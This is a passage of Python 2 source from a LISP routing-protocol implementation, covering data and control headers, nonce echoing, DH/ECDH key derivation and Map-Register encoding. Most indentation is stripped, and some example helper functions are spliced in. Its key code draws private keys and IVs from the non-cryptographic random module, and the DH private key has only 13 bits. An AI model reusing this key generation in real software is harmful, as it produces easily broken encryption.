# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
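#
# Example only, not referenced by the implementation: the two K-bits carry
# the crypto key-id and are recovered from the first long of the data
# header exactly as lisp_data_header.decode() does below.
#
def lisp_example_extract_key_id(first_long):
    return((first_long & LISP_K_BITS) >> 24)
#enddef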
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
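#
# Illustrative usage sketch, not invoked anywhere in this file: round-trip
# a data header through encode()/decode() to show how the I-bit and the
# 24-bit instance-id travel in the second long. The function name is an
# example, not part of the implementation.
#
def lisp_example_data_header_roundtrip():
    header = lisp_data_header()
    header.instance_id(1000)
    header.locator_status_bits(0x3)
    decoded = lisp_data_header()
    if (decoded.decode(header.encode()) == False): return(None)
    return(decoded.get_instance_id())
#enddef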
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start request-nonce mode and get a new nonce. If a request-nonce is
# already stored, use the same nonce as last time regardless of whether
# we received an echo response. Setting the high-order bit tells the
# caller to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If the last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happened so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
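#
# Example only: get_request_or_echo_nonce() above returns the nonce with
# the high-order bit set when the caller must also set the e-bit in the
# data header (request-nonce mode), and with the bit clear when the nonce
# is simply being echoed. A minimal illustrative check of that convention:
#
def lisp_example_nonce_needs_e_bit(nonce):
    return((nonce & 0x80000000) != 0)
#enddef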
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(pow(g, key, p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = pow(remote_key, key, p)
#endif
#
# This should only be used in a lab for debugging and never live, since
# it's a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
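#
# Lab-only sketch, not part of the protocol machinery: two lisp_keys()
# instances with do_curve=False exercise the 1024-bit DH path. Once each
# side learns the other's public key, compute_shared_key() should derive
# identical encryption and ICV keys on both ends. The function name and
# the "encap"/"decap" labels are illustrative only.
#
def lisp_example_dh_key_exchange():
    itr = lisp_keys(1, do_curve=False, do_chacha=False, do_poly=False)
    etr = lisp_keys(1, do_curve=False, do_chacha=False, do_poly=False)
    itr.remote_public_key = etr.local_public_key
    etr.remote_public_key = itr.local_public_key
    itr.compute_shared_key("encap")
    etr.compute_shared_key("decap")
    return(itr.encrypt_key == etr.encrypt_key and
        itr.icv_key == etr.icv_key)
#enddef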
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
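#
# Example only: the control message type is the high-order nibble of the
# first byte, as lisp_control_header.decode() above shows. A standalone
# illustration, assuming 'packet' holds the raw UDP payload:
#
def lisp_example_control_message_type(packet):
    if (len(packet) < 1): return(None)
    return(struct.unpack("B", packet[0:1])[0] >> 4)
#enddef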
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that identifies the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
